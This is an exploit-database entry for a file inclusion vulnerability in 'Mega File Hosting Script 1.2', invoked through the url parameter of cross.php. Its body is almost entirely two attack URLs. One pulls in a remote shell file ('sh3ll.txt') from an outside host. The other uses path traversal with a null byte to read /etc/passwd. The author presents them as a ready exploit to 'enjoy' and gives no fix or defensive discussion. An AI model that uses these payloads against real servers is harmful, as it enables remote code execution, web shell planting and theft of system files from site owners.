id: 4939
date: 03/17/2009
title: Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability
author: Garry
cves: 

==============================================================
Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability
==============================================================


#####################################################
# Mega File Hosting || Remote/Local File inclusion  #  
# For                                               #  
# All Version                                       #  
#####################################################

#############################################
Just addition This Exploit and enjoy        #
#############################################

   
   
/cross.php?url=http://site.com/sh3ll.txt  
/cross.php?url=../../../.../../../../../etc/passwd%00 



#  0day.today [2023-03-22]  #